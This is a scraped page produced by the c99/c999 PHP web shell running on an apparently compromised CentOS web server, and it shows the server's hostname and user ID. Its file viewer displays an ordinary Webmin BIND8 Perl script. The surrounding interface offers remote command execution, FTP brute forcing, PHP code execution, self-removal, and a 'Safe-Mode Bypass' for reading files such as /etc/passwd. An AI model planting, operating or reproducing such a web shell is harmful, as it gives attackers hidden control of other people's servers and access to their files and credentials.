!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bind8/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_controls.cgi (2.16 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Save control interface options

require './bind8-lib.pl';
$access{'defaults'} || &error($text{'controls_ecannot'});
&error_setup($text{'controls_err'});
&ReadParse();

# Validate and store inputs
&lock_file(&make_chroot($config{'named_conf'}));
$parent = &get_config_parent();
$conf = &get_config();
$controls = &find("controls", $conf);
if (!$controls) {
    $controls = { 'name' => 'controls', 'type' => 1 };
    &save_directive($parent, "controls", [ $controls ]);
    }
$inet = &find("inet", $controls->{'members'});
$unix = &find("unix", $controls->{'members'});

# Save inet control options
if ($in{'inet'}) {
    $inet ||= { 'name' => 'inet', 'type' => 2 };
    &check_ipaddress($in{'ip'}) || &error($text{'controls_einetip'});
    $in{'port'} =~ /^\d+$/ && $in{'port'} > 0 && $in{'port'} < 65536 ||
        &error($text{'controls_einetport'});
    $inet->{'values'} = [ $in{'ip'}, "port", $in{'port'} ];
    @allow = split(/\s+/, $in{'allow'});
    foreach $a (@allow) {
        &check_ipaddress($a) ||
            &error(&text('controls_einetallow', $a));
        }
    @allow || &error($text{'controls_einetallows'});
    $inet->{'members'}->{'allow'} =
        [ map { { 'name' => $_ } } @allow ];
    @keys = split(/\s+/, $in{'keys'});
    if (@keys) {
        $inet->{'members'}->{'keys'} = 
            [ map { { 'name' => $_ } } @keys ];
        }
    else {
        delete($inet->{'members'}->{'keys'});
        }
    &save_directive($controls, "inet", [ $inet ], 1);
    }
else {
    &save_directive($controls, "inet", [ ], 1);
    }

# Save local control options
if ($in{'unix'}) {
    $unix ||= { 'name' => 'unix', 'type' => 0 };
    $in{'path'} =~ /^\/\S+$/ || &error($text{'controls_eunixpath'});
    $in{'perm'} =~ /^[0-7]{3,4}$/ || &error($text{'controls_eunixperm'});
    $owner = getpwnam($in{'owner'});
    defined($owner) || &error($text{'controls_eunixowner'});
    $group = getgrnam($in{'group'});
    defined($group) || &error($text{'controls_eunixgroup'});
    $unix->{'values'} = [ $in{'path'}, "perm", $in{'perm'},
                  "owner", $owner, "group", $group ];
    &save_directive($controls, "unix", [ $unix ], 1);
    }
else {
    &save_directive($controls, "unix", [ ], 1);
    }

&flush_file_lines();
&unlock_file(&make_chroot($config{'named_conf'}));
&webmin_log("controls", undef, undef, \%in);
&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0094 ]--